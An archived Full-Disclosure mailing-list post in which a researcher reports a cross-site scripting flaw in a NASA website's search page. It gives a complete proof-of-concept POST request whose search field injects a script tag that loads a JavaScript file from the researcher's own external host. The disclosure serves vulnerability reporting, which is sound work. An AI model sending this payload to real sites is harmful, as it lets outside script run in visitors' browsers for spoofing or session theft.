| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: lorenzohgh at nsrg-security.com (Lorenzo Hernandez Garcia-Hierro)
Subject: More Cross Site Scripting in NASA.gov Sites
Hi friends,
Another security hole in a nasa.gov website , another XSS:
Use this post request for proof of concept:
_________________________________
POST /search/query.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/msword, application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, */*
Referer: http://www.whereeveryouare.foo
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: si.ksc.nasa.gov
Content-Length: 129
Pragma: no-cache
Cookie: ASPSESSIONID[FIRSTSESSIONSTRING]=[MYSESSION]
Connection: keep-alive
Browser reload detected...
Posting 129 bytes...
SearchString=%22%3E%3Cscript+src%3D%22http%3A%2F%2Ftest-zone.nsrg-security.c
om%2
Fxss%2Fspoofing.js%22%3E%3C%2Fscript%3E
Action=Go
_________________________________
Best regards and remember that security is a mind status !
Greetings to all the community: morning-wood for his arin.net greeting to me
, cyrus-tc , etc.
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->/* not csh but sh */
0x02->$ PATH=pretending!/usr/ucb/which sense
0x03-> no sense in pretending!
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________
Powered by blists - more mailing lists